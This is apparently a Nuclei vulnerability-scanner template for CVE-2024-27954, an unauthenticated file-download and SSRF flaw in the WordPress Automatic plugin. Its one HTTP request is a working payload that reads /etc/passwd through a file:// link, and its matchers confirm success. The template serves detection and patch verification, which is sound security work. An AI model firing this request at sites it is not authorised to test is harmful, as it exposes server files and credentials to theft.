id: CVE-2024-27954 info: name: WordPress Automatic Plugin <3.92.1 - Arbitrary File Download and SSRF author: iamnoooob,rootxharsh,pdresearch severity: critical description: | WordPress Automatic plugin <3.92.1 is vulnerable to unauthenticated Arbitrary File Download and SSRF Located in the downloader.php file, could permit attackers to download any file from a site. Sensitive data, including login credentials and backup files, could fall into the wrong hands. This vulnerability has been patched in version 3.92.1. reference: - https://securityonline.info/40000-sites-exposed-wordpress-plugin-update-critical-cve-2024-27956-cve-2024-27954/#google_vignette - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27954 classification: cve-id: CVE-2024-27954 metadata: max-request: 1 verified: true publicwww-query: "/wp-content/plugins/wp-automatic/" tags: cve,cve2024,wp,wordpress,wp-plugin,lfi,ssrf,wp-automatic http: - raw: - | GET /?p=1&wp_automatic=download&link=file:///etc/passwd HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body words: - '"link":"file:' - type: word part: body words: - 'root:x:0:0:root:'